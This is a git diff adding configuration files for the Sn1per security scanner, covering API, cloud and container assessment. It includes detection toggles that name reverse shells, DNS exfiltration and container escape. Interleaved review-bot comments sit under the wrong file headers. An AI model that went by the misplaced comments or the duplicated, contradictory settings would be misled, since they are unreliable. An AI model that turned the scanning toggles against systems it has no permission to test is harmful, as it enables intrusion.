+REQUIRE_STRICT_TRANSPORT_SECURITY="1"
+REQUIRE_CONTENT_SECURITY_POLICY="1"
+REQUIRE_X_CONTENT_TYPE_OPTIONS="1"
+REQUIRE_X_FRAME_OPTIONS="1"
+REQUIRE_X_XSS_PROTECTION="1"
+REQUIRE_REFERRER_POLICY="1"
+REQUIRE_PERMISSIONS_POLICY="1"
+
+# API Security Testing Advanced Options
+ADVANCED_FUZZING="1"
+ADVANCED_INJECTION_TESTS="1"
+ADVANCED_AUTH_TESTING="1"
+ADVANCED_ANALYTICS="1"
+
+# API Security Reporting
+REPORT_FORMAT="html" # Options: html, json, pdf, markdown
+REPORT_OUTPUT_DIR="$LOOT_DIR/api-security"
+REPORT_DETAIL_LEVEL="detailed" # Options: quick, standard, detailed
+GENERATE_EXECUTIVE_SUMMARY="1"
+INCLUDE_REMEDIATION_GUIDANCE="1"
+
+# API Security Notifications
+ENABLE_EMAIL_NOTIFICATIONS="0"
+EMAIL_RECIPIENTS=""
+ENABLE_SLACK_NOTIFICATIONS="0"
+SLACK_WEBHOOK_URL=""
+ENABLE_WEBHOOK_NOTIFICATIONS="0"
+WEBHOOK_URL=""
+
+# API Security Automation
+ENABLE_AUTOMATION="1"
+AUTOMATION_PROVIDER="" # Options: jenkins, gitlab, github-actions, azure-devops
+AUTOMATION_TRIGGER="" # Options: push, pull-request, schedule, manual
+AUTOMATION_SCHEDULE="0 0 * * *" # Daily at midnight
+
+# API Security Continuous Integration/Continuous Deployment (CI/CD)
+ENABLE_CI_CD_INTEGRATION="1"
+CI_CD_PROVIDER="" # Options: jenkins, gitlab, github, bitbucket, azure-devops
+CI_CD_CONFIG_FILE=""
+
+# API Security Customization
+CUSTOM_CHECKS_ENABLED="1"
+CUSTOM_CHECKS_DIR="$INSTALL_DIR/conf/api-checks"
+CUSTOM_RULES_ENABLED="1"
+CUSTOM_RULES_DIR="$INSTALL_DIR/conf/api-rules"
+
+# API Security Machine Learning
+ENABLE_ML_ANALYSIS="1"
+ML_MODEL_PATH="$INSTALL_DIR/ml-models/api-security"
+ML_THRESHOLD="0.8"
+
+# API Security Threat Intelligence
+ENABLE_THREAT_INTELLIGENCE="1"
+THREAT_INTELLIGENCE_FEEDS="" # Comma-separated list of threat intelligence feed URLs
+THREAT_INTELLIGENCE_UPDATE_FREQUENCY="24h"
+
+# API Security Governance
+ENABLE_GOVERNANCE="1"
+GOVERNANCE_FRAMEWORK="" # Options: itil, cobit, iso27001, nist-csf
+GOVERNANCE_POLICIES="" # Path to governance policies
+
+# API Security Continuous Improvement
+ENABLE_CONTINUOUS_IMPROVEMENT="1"
+IMPROVEMENT_METRICS="" # Comma-separated list of metrics to track
+IMPROVEMENT_GOALS="" # Comma-separated list of improvement goals
diff --git a/conf/cloud_security b/conf/cloud_security
new file mode 100644
index 00000000..186f2557
--- /dev/null
+++ b/conf/cloud_security
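Review bot: This file ships credential slots (`API_PASSWORD`, `API_BEARER_TOKEN`, `OAUTH2_CLIENT_SECRET`, `API_KEY_VALUE`, `JWT_SECRET`, `ZAP_API_KEY`, `BURP_API_KEY`, `SLACK_WEBHOOK_URL`) as plain assignments in a tracked file, so the first user who fills one in commits it; reading them from the environment instead, e.g. `API_PASSWORD="${API_PASSWORD:-}"`, keeps the tracked file value-free while preserving the variable names. `TEST_LOAD="1"` together with `LOAD_TEST_USERS="100"` and `LOAD_TEST_DURATION="300"` turns on a five-minute, 100-user load test against the target by default, which is opt-in behaviour for a scanner profile; `TEST_LOAD="0"` is the safer default. Several values are paths or endpoints that nothing on the page validates (`TEST_PAYLOADS`, `FUZZING_WORDLIST`, `NUCLEI_TEMPLATES`, `ZAP_PROXY`), and no visible code reads any of these variables, so a header comment naming the sniper mode that sources this file would help a maintainer tell live settings from placeholders. The file is sourced shell, not YAML; the two-line header could say so, e.g. `# Sourced by sniper as shell; values are quoted strings, "1"/"0" toggles.`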
@@ -0,0 +1,317 @@
+# Cloud Security Configuration for Sn1per
+# This configuration optimizes Sn1per for cloud security assessment
+
+# Cloud Provider Settings
+CLOUD_PROVIDER="all" # Options: all, aws, azure, gcp, digitalocean, oracle, alibaba
+CLOUD_REGION="" # Leave empty for all regions
+
+# AWS Configuration
+AWS_ACCESS_KEY_ID=""
+AWS_SECRET_ACCESS_KEY=""
+AWS_SESSION_TOKEN=""
+AWS_REGIONS="us-east-1,us-east-2,us-west-1,us-west-2,eu-west-1,eu-central-1,ap-southeast-1,ap-southeast-2,ap-northeast-1,ap-northeast-2,sa-east-1,ap-south-1,ca-central-1"
+AWS_SCAN_SERVICES="ec2,s3,iam,rds,lambda,cloudfront,cloudtrail,config,cloudformation,ecr,ecs,eks,elasticache,es,glacier,kms,secretsmanager,ssm"
+
+# Azure Configuration
+AZURE_CLIENT_ID=""
+AZURE_CLIENT_SECRET=""
+AZURE_TENANT_ID=""
+AZURE_SUBSCRIPTION_ID=""
+AZURE_REGIONS="eastus,eastus2,westus,westus2,centralus,northcentralus,southcentralus,northeurope,westeurope"
+
+# Google Cloud Configuration
+GOOGLE_APPLICATION_CREDENTIALS=""
+GOOGLE_CLOUD_PROJECT=""
+GOOGLE_CLOUD_REGIONS="us-central1,us-east1,us-east4,us-west1,us-west2,us-west3,us-west4,northamerica-northeast1,southamerica-east1,europe-north1,europe-west1,europe-west2,europe-west3,europe-west4,europe-west6,asia-east1,asia-east2,asia-northeast1,asia-northeast2,asia-northeast3,asia-south1,asia-southeast1,asia-southeast2,australia-southeast1"
+
+# Cloud Security Scanning Options
+SCAN_CLOUD_STORAGE="1"
+SCAN_CLOUD_COMPUTE="1"
+SCAN_CLOUD_NETWORKING="1"
+SCAN_CLOUD_IAM="1"
+SCAN_CLOUD_DATABASES="1"
+SCAN_CLOUD_LOGGING="1"
+SCAN_CLOUD_SECURITY_SERVICES="1"
+
+# Cloud Storage Scanning Options
+SCAN_STORAGE_PUBLIC_ACCESS="1"
+SCAN_STORAGE_ENCRYPTION="1"
+SCAN_STORAGE_LOGGING="1"
+SCAN_STORAGE_VERSIONING="1"
+SCAN_STORAGE_ACCESS_CONTROL="1"
+
+# Compute Scanning Options
+SCAN_COMPUTE_VULNERABILITIES="1"
+SCAN_COMPUTE_CONFIGURATION="1"
+SCAN_COMPUTE_SECURITY_GROUPS="1"
+SCAN_COMPUTE_METADATA="1"
+SCAN_COMPUTE_IMAGES="1"
+
+# Networking Scanning Options
+SCAN_NETWORK_ACLS="1"
+SCAN_LOAD_BALANCERS="1"
+SCAN_CDN_CONFIGURATION="1"
+SCAN_DNS_CONFIGURATION="1"
+SCAN_VPC_CONFIGURATION="1"
+
+# IAM Scanning Options
+SCAN_IAM_POLICIES="1"
+SCAN_IAM_ROLES="1"
+SCAN_IAM_USERS="1"
+SCAN_IAM_GROUPS="1"
+SCAN_IAM_KEYS="1"
+SCAN_IAM_PASSWORD_POLICY="1"
+SCAN_IAM_MFA="1"
+
+# Database Scanning Options
+SCAN_DATABASE_PUBLIC_ACCESS="1"
+SCAN_DATABASE_ENCRYPTION="1"
+SCAN_DATABASE_BACKUPS="1"
+SCAN_DATABASE_PATCHES="1"
+
+# Logging and Monitoring Options
+SCAN_CLOUDTRAIL_LOGS="1"
+SCAN_CLOUDWATCH_LOGS="1"
+SCAN_STACKDRIVER_LOGS="1"
+SCAN_MONITORING_ALERTS="1"
+SCAN_CONFIG_RULES="1"
+
+# Security Services Options
+SCAN_WAF_CONFIGURATION="1"
+SCAN_SHIELD_CONFIGURATION="1"
+SCAN_GUARDDUTY_FINDINGS="1"
+SCAN_SECURITY_HUB_FINDINGS="1"
+SCAN_INSPECTOR_FINDINGS="1"
+
+# Cloud Security Tools
+USE_CLOUDFLARE_SCAN="1"
+USE_CLOUDFLARE_IP_RANGES="1"
+USE_AWS_INSPECTOR="1"
+USE_AWS_TRUSTED_ADVISOR="1"
+USE_AZURE_SECURITY_CENTER="1"
+USE_GCP_SECURITY_COMMAND_CENTER="1"
+
+# Cloud Security Scanners
+USE_CLOUDFLAIR="1"
+USE_CLOUDFRONT_ENUM="1"
+USE_S3SCANNER="1"
+USE_CLOUDFAIL="1"
+USE_CLOUDGUARDIAN="1"
+
+# Rate Limiting and Throttling
+CLOUD_API_RATE_LIMIT="100" # Requests per second
+CLOUD_API_RETRY_ATTEMPTS="3"
+CLOUD_API_TIMEOUT="30" # seconds
+
+# Output and Reporting
+CLOUD_REPORT_FORMAT="html" # Options: html, json, csv, xml
+CLOUD_REPORT_DETAIL_LEVEL="detailed" # Options: quick, standard, detailed
+CLOUD_REPORT_OUTPUT_DIR="$LOOT_DIR/cloud"
+
+# Notification Settings
+CLOUD_ALERT_CRITICAL="1"
+CLOUD_ALERT_HIGH="1"
+CLOUD_ALERT_MEDIUM="1"
+CLOUD_ALERT_LOW="0"
+CLOUD_ALERT_INFO="0"
+
+# Cloud Provider Specific Settings
+## AWS Specific
+AWS_SCAN_ORGANIZATIONS="1"
+AWS_SCAN_SERVICE_LIMITS="1"
+AWS_SCAN_TRUSTED_ADVISOR="1"
+AWS_SCAN_INSPECTOR_FINDINGS="1"
+AWS_SCAN_GUARDDUTY_FINDINGS="1"
+AWS_SCAN_MACIE_FINDINGS="1"
+AWS_SCAN_SECURITY_HUB_FINDINGS="1"
+
+## Azure Specific
+AZURE_SCAN_SECURITY_CENTER="1"
+AZURE_SCAN_POLICY_COMPLIANCE="1"
+AZURE_SCAN_ADVISOR_RECOMMENDATIONS="1"
+
+## GCP Specific
+GCP_SCAN_SECURITY_COMMAND_CENTER="1"
+GCP_SCAN_ORG_POLICIES="1"
+GCP_SCAN_ACTIVITY_LOGS="1"
+
+# Cloud Security Posture Management (CSPM)
+ENABLE_CSPM_SCAN="1"
+CSPM_PROVIDER="" # Options: aws, azure, gcp, all
+CSPM_FRAMEWORKS="cis,csc,iso27001,hipaa,gdpr"
+
+# Cloud Workload Protection (CWP)
+ENABLE_CWP_SCAN="1"
+CWP_SCAN_CONTAINERS="1"
+CWP_SCAN_SERVERLESS="1"
+CWP_SCAN_VM="1"
+
+# Cloud Security Posture Rules
+ENABLE_CSPM_RULES="1"
+CSPM_RULES_PATH="$INSTALL_DIR/conf/cspm-rules"
+
+# Cloud Security Exclusions
+CLOUD_EXCLUDE_RESOURCES="" # Comma-separated list of resource ARNs to exclude
+CLOUD_EXCLUDE_REGIONS="" # Comma-separated list of regions to exclude
+CLOUD_EXCLUDE_SERVICES="" # Comma-separated list of services to exclude
+
+# Cloud Security Benchmarking
+ENABLE_CLOUD_BENCHMARK="1"
+CLOUD_BENCHMARK_TOOL="" # Options: prowler, scoutsuite, cloud-custodian
+CLOUD_BENCHMARK_PROFILES="cis,csc"
+
+# Cloud Security Scanning Tools
+CLOUD_SCANNER_TOOL="" # Options: nuclei, nuclei-templates, cloud-sniper, pacu
+CLOUD_SCANNER_TEMPLATES="$INSTALL_DIR/cloud-templates"
+
+# Cloud Security Scanning Options
+CLOUD_SCAN_DEPTH="standard" # Options: quick, standard, deep
+CLOUD_SCAN_THREADS="10"
+CLOUD_SCAN_TIMEOUT="3600" # seconds
+
+# Cloud Security Output Options
+CLOUD_OUTPUT_VERBOSE="0"
+CLOUD_OUTPUT_DEBUG="0"
+CLOUD_OUTPUT_QUIET="0"
+
+# Cloud Security API Options
+CLOUD_API_CACHE_ENABLED="1"
+CLOUD_API_CACHE_TTL="3600" # seconds
+CLOUD_API_CACHE_DIR="$HOME/.sniper/cloud-cache"
+
+# Cloud Security Compliance Options
+CLOUD_COMPLIANCE_STANDARDS="cis,pcidss,gdpr,hipaa,nist"
+CLOUD_COMPLIANCE_REPORT="1"
+
+# Cloud Security Remediation Options
+CLOUD_AUTO_REMEDIATE="0"
+CLOUD_REMEDIATION_DRY_RUN="1"
+
+# Cloud Security Integration Options
+INTEGRATE_ASFF="1" # AWS Security Finding Format
+INTEGRATE_SECURITY_HUB="1"
+INTEGRATE_SLACK="0"
+INTEGRATE_JIRA="0"
+INTEGRATE_PAGERDUTY="0"
+
+# Cloud Security Notification Options
+NOTIFY_ON_CRITICAL="1"
+NOTIFY_ON_HIGH="1"
+NOTIFY_ON_MEDIUM="0"
+NOTIFY_ON_LOW="0"
+NOTIFY_ON_INFO="0"
+
+# Cloud Security Schedule Options
+SCHEDULE_SCAN_DAILY="0"
+SCHEDULE_SCAN_WEEKLY="0"
+SCHEDULE_SCAN_MONTHLY="1"
+SCHEDULE_SCAN_CRON="0 0 1 * *" # First day of every month at midnight
+
+# Cloud Security Advanced Options
+CLOUD_ADVANCED_SCAN="0"
+CLOUD_AGGRESSIVE_SCAN="0"
+CLOUD_PASSIVE_SCAN="1"
+CLOUD_ACTIVE_SCAN="0"
+
+# Cloud Security API Throttling
+CLOUD_API_THROTTLE="100" # milliseconds between API calls
+CLOUD_API_MAX_RETRIES="3"
+CLOUD_API_RETRY_DELAY="5" # seconds
+
+# Cloud Security Data Collection
+COLLECT_CLOUD_METADATA="1"
+COLLECT_CLOUD_LOGS="1"
+COLLECT_CLOUD_METRICS="1"
+COLLECT_CLOUD_EVENTS="1"
+
+# Cloud Security Data Retention
+RETAIN_CLOUD_DATA_DAYS="90"
+COMPRESS_CLOUD_DATA="1"
+ENCRYPT_CLOUD_DATA="1"
+
+# Cloud Security Advanced Scanning
+ENABLE_CLOUD_PENETRATION_TESTING="0"
+ENABLE_CLOUD_RED_TEAMING="0"
+ENABLE_CLOUD_BLUE_TEAMING="1"
+ENABLE_CLOUD_PURPLE_TEAMING="0"
+
+# Cloud Security Automation
+ENABLE_CLOUD_AUTOMATION="1"
+AUTOMATION_PROVIDER="" # Options: aws-step-functions, azure-logic-apps, gcp-workflows
+AUTOMATION_TRIGGER="" # Options: schedule, event, manual
+AUTOMATION_SCHEDULE="rate(1 day)" # Default schedule for automation
+
+# Cloud Security Customization
+CUSTOM_CHECKS_ENABLED="1"
+CUSTOM_CHECKS_DIR="$INSTALL_DIR/conf/cloud-checks"
+CUSTOM_RULES_ENABLED="1"
+CUSTOM_RULES_DIR="$INSTALL_DIR/conf/cloud-rules"
+
+# Cloud Security API Security
+SCAN_API_GATEWAYS="1"
+SCAN_API_ENDPOINTS="1"
+SCAN_API_DOCUMENTATION="1"
+SCAN_API_AUTHENTICATION="1"
+SCAN_API_RATE_LIMITING="1"
+
+# Cloud Security Container Security
+SCAN_CONTAINER_REGISTRIES="1"
+SCAN_CONTAINER_IMAGES="1"
+SCAN_CONTAINER_ORCHESTRATION="1"
+SCAN_CONTAINER_RUNTIME="1"
+
+# Cloud Security Serverless Security
+SCAN_SERVERLESS_FUNCTIONS="1"
+SCAN_SERVERLESS_CONFIGURATION="1"
+SCAN_SERVERLESS_DEPENDENCIES="1"
+
+# Cloud Security Data Protection
+SCAN_DATA_CLASSIFICATION="1"
+SCAN_DATA_ENCRYPTION="1"
+SCAN_DATA_RETENTION="1"
+
+# Cloud Security Identity and Access
+SCAN_IDENTITY_FEDERATION="1"
+SCAN_ACCESS_ANALYTICS="1"
+SCAN_PRIVILEGED_ACCESS="1"
+
+# Cloud Security Network Security
+SCAN_NETWORK_TOPOLOGY="1"
+SCAN_NETWORK_TRAFFIC="1"
+SCAN_NETWORK_ACLS="1"
+
+# Cloud Security Logging and Monitoring
+SCAN_LOGGING_CONFIGURATION="1"
+SCAN_MONITORING_CONFIGURATION="1"
+SCAN_ALERTING_CONFIGURATION="1"
+
+# Cloud Security Compliance
+SCAN_COMPLIANCE_FRAMEWORKS="1"
+GENERATE_COMPLIANCE_REPORTS="1"
+AUTOMATE_COMPLIANCE_CHECKS="1"
+
+# Cloud Security Threat Detection
+ENABLE_THREAT_DETECTION="1"
+THREAT_INTELLIGENCE_FEEDS="1"
+BEHAVIORAL_ANALYTICS="1"
+ANOMALY_DETECTION="1"
+
+# Cloud Security Incident Response
+INCIDENT_RESPONSE_PLAN="1"
+AUTOMATED_INCIDENT_RESPONSE="1"
+FORENSICS_COLLECTION="1"
+
+# Cloud Security Training and Awareness
+SECURITY_AWARENESS_TRAINING="1"
+PHISHING_SIMULATION="1"
+SECURITY_CERTIFICATION="1"
+
+# Cloud Security Governance
+SECURITY_GOVERNANCE_FRAMEWORK="1"
+RISK_MANAGEMENT="1"
+SECURITY_METRICS_AND_REPORTING="1"
+
+# Cloud Security Continuous Improvement
+CONTINUOUS_IMPROVEMENT_PROGRAM="1"
+SECURITY_MATURITY_ASSESSMENT="1"
+BENCHMARKING_AND_METRICS="1"
diff --git a/conf/container_security b/conf/container_security
new file mode 100644
index 00000000..a234e58b
--- /dev/null
+++ b/conf/container_security
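Review bot: `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`, `AWS_SESSION_TOKEN`, `AZURE_CLIENT_SECRET` and `GOOGLE_APPLICATION_CREDENTIALS` are empty slots in a file that ships under `conf/`, so the path of least resistance is to paste long-lived cloud credentials into a tracked file; add above the AWS block `# Leave these empty to use the provider's own credential chain (env vars, profiles, instance roles); never commit filled-in values.` Several names here collide with the other config files in this commit — `CUSTOM_CHECKS_DIR`, `CUSTOM_RULES_DIR`, `AUTOMATION_PROVIDER`, `AUTOMATION_TRIGGER`, `AUTOMATION_SCHEDULE` and `THREAT_INTELLIGENCE_FEEDS` are also assigned in the API-security and container-security configs with different values, and `THREAT_INTELLIGENCE_FEEDS` is `"1"` here but a URL list there — so if these files are ever sourced into one shell the last one read wins silently; a `CLOUD_` prefix would avoid that. `SCAN_NETWORK_ACLS="1"` is itself assigned twice within this file. `CLOUD_API_RATE_LIMIT="100" # Requests per second` and `CLOUD_API_THROTTLE="100" # milliseconds between API calls` express the same limit in two units that contradict each other; keep one.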
@@ -0,0 +1,338 @@
+# Container Security Configuration for Sn1per
+# This configuration optimizes Sn1per for container security assessment
+
+# General Settings
+CONTAINER_RUNTIME="docker" # Options: docker, containerd, crio, podman
+SCAN_RUNNING_CONTAINERS="1"
+SCAN_STOPPED_CONTAINERS="1"
+SCAN_CONTAINER_IMAGES="1"
+SCAN_CONTAINER_REGISTRIES="1"
+SCAN_CONTAINER_ORCHESTRATORS="1"
+
+# Docker Configuration
+DOCKER_SOCKET="/var/run/docker.sock"
+DOCKER_TLS_ENABLED="0"
+DOCKER_TLS_VERIFY="0"
+DOCKER_CERT_PATH="$HOME/.docker/"
+
+# Kubernetes Configuration
+KUBECONFIG="$HOME/.kube/config"
+SCAN_KUBERNETES_CLUSTER="1"
+SCAN_KUBERNETES_NAMESPACES="all" # Comma-separated list or 'all'
+SCAN_KUBERNETES_PODS="1"
+SCAN_KUBERNETES_DEPLOYMENTS="1"
+SCAN_KUBERNETES_SERVICES="1"
+SCAN_KUBERNETES_INGRESS="1"
+SCAN_KUBERNETES_NETWORK_POLICIES="1"
+SCAN_KUBERNETES_RBAC="1"
+SCAN_KUBERNETES_PSP="1"
+SCAN_KUBERNETES_CRDS="1"
+
+# Container Registry Configuration
+REGISTRY_URL=""
+REGISTRY_USERNAME=""
+REGISTRY_PASSWORD=""
+REGISTRY_INSECURE="0"
+SCAN_REGISTRY_IMAGES="1"
+SCAN_REGISTRY_TAGS="latest" # Comma-separated list or 'all'
+
+# Container Security Scanning Tools
+USE_TRIVY="1"
+TRIVY_SEVERITY="CRITICAL,HIGH,MEDIUM"
+TRIVY_IGNORE_UNFIXED="1"
+TRIVY_VULN_TYPE="os,library"
+TRIVY_SECURITY_CHECKS="vuln,config,secret"
+
+USE_DOCKLE="1"
+DOCKLE_IGNORE_CHECKS=""
+DOCKLE_ACCEPT_KEYS=""
+
+USE_CLAIRE="1"
+USE_ANCHORE="0"
+USE_CLAIR="1"
+USE_GRYPE="1"
+
+# Container Vulnerability Scanning
+SCAN_VULNERABILITIES="1"
+SCAN_MISCONFIGURATIONS="1"
+SCAN_SECRETS="1"
+SCAN_DEPENDENCIES="1"
+SCAN_OS_PACKAGES="1"
+SCAN_LANGUAGE_PACKAGES="1"
+SCAN_ROOTFS="1"
+
+# Container Runtime Security
+MONITOR_CONTAINER_RUNTIME="1"
+DETECT_PRIVILEGED_CONTAINERS="1"
+DETECT_ROOT_CONTAINERS="1"
+DETECT_EXPOSED_DOCKER_SOCKET="1"
+DETECT_SENSITIVE_MOUNTS="1"
+DETECT_SENSITIVE_ENV_VARS="1"
+
+# Container Network Security
+SCAN_CONTAINER_NETWORK="1"
+DETECT_EXPOSED_PORTS="1"
+DETECT_NETWORK_POLICIES="1"
+DETECT_NETWORK_ISOLATION="1"
+
+# Container Storage Security
+SCAN_VOLUMES="1"
+DETECT_SENSITIVE_VOLUMES="1"
+DETECT_READ_ONLY_FILESYSTEM="1"
+DETECT_TMPFS_MOUNTS="1"
+
+# Container Image Security
+SCAN_IMAGE_HISTORY="1"
+SCAN_IMAGE_LAYERS="1"
+DETECT_CLEAR_TEXT_CREDENTIALS="1"
+DETECT_HARDCODED_SECRETS="1"
+DETECT_EXPOSED_CREDENTIALS="1"
+
+# Container Compliance
+CHECK_CIS_BENCHMARK="1"
+CHECK_NIST_BENCHMARK="1"
+CHECK_DISA_STIG="1"
+CHECK_ISO27001="1"
+CHECK_HIPAA="1"
+CHECK_PCI_DSS="1"
+CHECK_GDPR="1"
+
+# Kubernetes Security
+SCAN_KUBERNETES_API="1"
+SCAN_KUBERNETES_ETCD="1"
+SCAN_KUBERNETES_DASHBOARD="1"
+SCAN_KUBERNETES_DNS="1"
+SCAN_KUBERNETES_PROXY="1"
+SCAN_KUBERNETES_SCHEDULER="1"
+SCAN_KUBERNETES_CONTROLLER="1"
+SCAN_KUBERNETES_WORKERS="1"
+
+# Kubernetes Workload Security
+SCAN_KUBERNETES_POD_SECURITY_CONTEXT="1"
+SCAN_KUBERNETES_CONTAINER_SECURITY_CONTEXT="1"
+SCAN_KUBERNETES_SERVICE_ACCOUNTS="1"
+SCAN_KUBERNETES_NETWORK_POLICIES="1"
+SCAN_KUBERNETES_INGRESS="1"
+SCAN_KUBERNETES_STORAGE="1"
+
+# Kubernetes API Security
+SCAN_KUBERNETES_API_AUTHENTICATION="1"
+SCAN_KUBERNETES_API_AUTHORIZATION="1"
+SCAN_KUBERNETES_API_ADMISSION_CONTROLLERS="1"
+SCAN_KUBERNETES_API_AUDIT_LOGGING="1"
+
+# Kubernetes Network Security
+SCAN_KUBERNETES_NETWORK_POLICIES="1"
+SCAN_KUBERNETES_NETWORK_ISOLATION="1"
+SCAN_KUBERNETES_NETWORK_PLUGIN="1"
+SCAN_KUBERNETES_EGRESS_CONTROL="1"
+
+# Kubernetes Storage Security
+SCAN_KUBERNETES_VOLUMES="1"
+SCAN_KUBERNETES_SECRETS="1"
+SCAN_KUBERNETES_CONFIGMAPS="1"
+SCAN_KUBERNETES_PERSISTENT_VOLUMES="1"
+
+# Kubernetes Monitoring and Logging
+SCAN_KUBERNETES_LOGGING="1"
+SCAN_KUBERNETES_MONITORING="1"
+SCAN_KUBERNETES_AUDIT_LOGS="1"
+SCAN_KUBERNETES_EVENTS="1"
+
+# Kubernetes Compliance
+SCAN_KUBERNETES_CIS_BENCHMARK="1"
+SCAN_KUBERNETES_NIST_BENCHMARK="1"
+SCAN_KUBERNETES_DISA_STIG="1"
+SCAN_KUBERNETES_ISO27001="1"
+SCAN_KUBERNETES_HIPAA="1"
+SCAN_KUBERNETES_PCI_DSS="1"
+SCAN_KUBERNETES_GDPR="1"
+
+# Container Registry Security
+SCAN_REGISTRY_AUTHENTICATION="1"
+SCAN_REGISTRY_AUTHORIZATION="1"
+SCAN_REGISTRY_IMAGE_SIGNING="1"
+SCAN_REGISTRY_IMAGE_SCANNING="1"
+SCAN_REGISTRY_IMAGE_ACCESS_CONTROL="1"
+
+# Container Build Security
+SCAN_DOCKERFILE="1"
+SCAN_DOCKER_COMPOSE="1"
+SCAN_KUBERNETES_MANIFESTS="1"
+SCAN_HELM_CHARTS="1"
+SCAN_KUSTOMIZE="1"
+
+# Container Runtime Security
+MONITOR_CONTAINER_RUNTIME="1"
+DETECT_CONTAINER_ESCAPE="1"
+DETECT_PRIVILEGE_ESCALATION="1"
+DETECT_SHELL_ACCESS="1"
+DETECT_REVERSE_SHELLS="1"
+DETECT_CRYPTOMINERS="1"
+DETECT_MALWARE="1"
+
+# Container Network Security
+MONITOR_CONTAINER_NETWORK="1"
+DETECT_NETWORK_ANOMALIES="1"
+DETECT_DNS_EXFILTRATION="1"
+DETECT_DNS_TUNNELING="1"
+DETECT_PORT_SCANNING="1"
+DETECT_BRUTE_FORCE_ATTEMPTS="1"
+
+# Container File System Security
+MONITOR_FILE_SYSTEM="1"
+DETECT_FILE_CHANGES="1"
+DETECT_SENSITIVE_FILES="1"
+DETECT_UNAUTHORIZED_MOUNTS="1"
+DETECT_UNAUTHORIZED_VOLUMES="1"
+
+# Container Process Security
+MONITOR_PROCESSES="1"
+DETECT_NEW_PROCESSES="1"
+DETECT_PRIVILEGED_PROCESSES="1"
+DETECT_SUSPICIOUS_PROCESSES="1"
+DETECT_CRYPTOMINING_PROCESSES="1"
+
+# Container User Security
+MONITOR_USERS_AND_GROUPS="1"
+DETECT_NEW_USERS="1"
+DETECT_PRIVILEGED_USERS="1"
+DETECT_SUDO_ACCESS="1"
+DETECT_SUID_SGID_FILES="1"
+
+# Container Logging and Monitoring
+ENABLE_CONTAINER_LOGGING="1"
+ENABLE_CONTAINER_METRICS="1"
+ENABLE_CONTAINER_TRACING="1"
+ENABLE_CONTAINER_AUDITING="1"
+
+# Container Incident Response
+ENABLE_INCIDENT_RESPONSE="1"
+AUTOMATED_INCIDENT_RESPONSE="1"
+FORENSIC_COLLECTION="1"
+CONTAINER_FORENSICS="1"
+MEMORY_FORENSICS="1"
+
+# Container Security Tools
+USE_FALCO="1"
+USE_AQUA="0"
+USE_AQUA_ENTERPRISE="0"
+USE_PRISMA_CLOUD="0"
+USE_SYS_DIG="1"
+USE_OSQUERY="1"
+USE_CILIUM="1"
+USE_CALICO="1"
+
+# Container Security Posture Management
+ENABLE_CSPM="1"
+CSPM_PROVIDER="" # Options: aws, azure, gcp, on-prem
+CSPM_FRAMEWORKS="cis, nist, pci"
+
+# Container Vulnerability Management
+ENABLE_VULNERABILITY_MANAGEMENT="1"
+VULNERABILITY_SCAN_SCHEDULE="0 0 * * *" # Daily at midnight
+VULNERABILITY_SCAN_THRESHOLD="high"
+VULNERABILITY_SCAN_REPORT_FORMAT="html"
+
+# Container Image Signing and Verification
+ENABLE_IMAGE_SIGNING="1"
+ENABLE_IMAGE_VERIFICATION="1"
+SIGNING_KEY_PATH=""
+VERIFICATION_KEY_PATH=""
+
+# Container Runtime Protection
+ENABLE_RUNTIME_PROTECTION="1"
+RUNTIME_PROTECTION_ENGINE="" # Options: falco, aqua, prisma, sysdig
+RUNTIME_PROTECTION_RULES="$INSTALL_DIR/conf/container-rules"
+
+# Container Network Security
+ENABLE_NETWORK_POLICIES="1"
+ENABLE_NETWORK_ISOLATION="1"
+ENABLE_EGRESS_CONTROL="1"
+ENABLE_INGRESS_CONTROL="1"
+
+# Container Secrets Management
+ENABLE_SECRETS_MANAGEMENT="1"
+SECRETS_MANAGEMENT_PROVIDER="" # Options: hashicorp-vault, aws-secrets-manager, azure-key-vault, gcp-secret-manager
+SECRETS_MANAGEMENT_INTEGRATION="1"
+
+# Container Compliance and Governance
+ENABLE_COMPLIANCE_MONITORING="1"
+COMPLIANCE_STANDARDS="cis, nist, pci, gdpr, hipaa"
+AUTOMATED_REMEDIATION="1"
+
+# Container Security Reporting
+REPORT_FORMAT="html" # Options: html, json, pdf, csv
+REPORT_OUTPUT_DIR="$LOOT_DIR/container-security"
+REPORT_RETENTION_DAYS="90"
+
+# Container Security Notifications
+ENABLE_EMAIL_NOTIFICATIONS="0"
+EMAIL_RECIPIENTS=""
+ENABLE_SLACK_NOTIFICATIONS="0"
+SLACK_WEBHOOK_URL=""
+ENABLE_WEBHOOK_NOTIFICATIONS="0"
+WEBHOOK_URL=""
+
+# Container Security API
+ENABLE_API="1"
+API_PORT="8080"
+API_AUTHENTICATION="1"
+API_AUTHENTICATION_TOKEN=""
+
+# Container Security Advanced Options
+DEBUG_MODE="0"
+VERBOSE_OUTPUT="0"
+ENABLE_PERFORMANCE_MONITORING="1"
+ENABLE_RESOURCE_OPTIMIZATION="1"
+
+# Container Security Customization
+CUSTOM_CHECKS_ENABLED="1"
+CUSTOM_CHECKS_DIR="$INSTALL_DIR/conf/container-checks"
+CUSTOM_RULES_ENABLED="1"
+CUSTOM_RULES_DIR="$INSTALL_DIR/conf/container-rules"
+
+# Container Security Continuous Integration/Continuous Deployment (CI/CD)
+ENABLE_CI_CD_INTEGRATION="1"
+CI_CD_PROVIDER="" # Options: jenkins, gitlab, github, bitbucket, azure-devops
+CI_CD_CONFIG_FILE=""
+
+# Container Security Orchestration
+ENABLE_ORCHESTRATION="1"
+ORCHESTRATION_PROVIDER="" # Options: kubernetes, docker-swarm, nomad, mesos
+ORCHESTRATION_CONFIG_FILE=""
+
+# Container Security Machine Learning
+ENABLE_ML_ANALYSIS="1"
+ML_MODEL_PATH="$INSTALL_DIR/ml-models/container-security"
+ML_THRESHOLD="0.8"
+
+# Container Security Threat Intelligence
+ENABLE_THREAT_INTELLIGENCE="1"
+THREAT_INTELLIGENCE_FEEDS="" # Comma-separated list of threat intelligence feed URLs
+THREAT_INTELLIGENCE_UPDATE_FREQUENCY="24h"
+
+# Container Security Automation
+ENABLE_AUTOMATION="1"
+AUTOMATION_PROVIDER="" # Options: ansible, terraform, puppet, chef
+AUTOMATION_PLAYBOOK_PATH=""
+
+# Container Security Backup and Recovery
+ENABLE_BACKUP="1"
+BACKUP_LOCATION="" # Local path or cloud storage URL
+BACKUP_RETENTION_DAYS="30"
+
+# Container Security Training and Awareness
+ENABLE_TRAINING="1"
+TRAINING_MODULES="" # Comma-separated list of training modules
+TRAINING_FREQUENCY="30d"
+
+# Container Security Governance
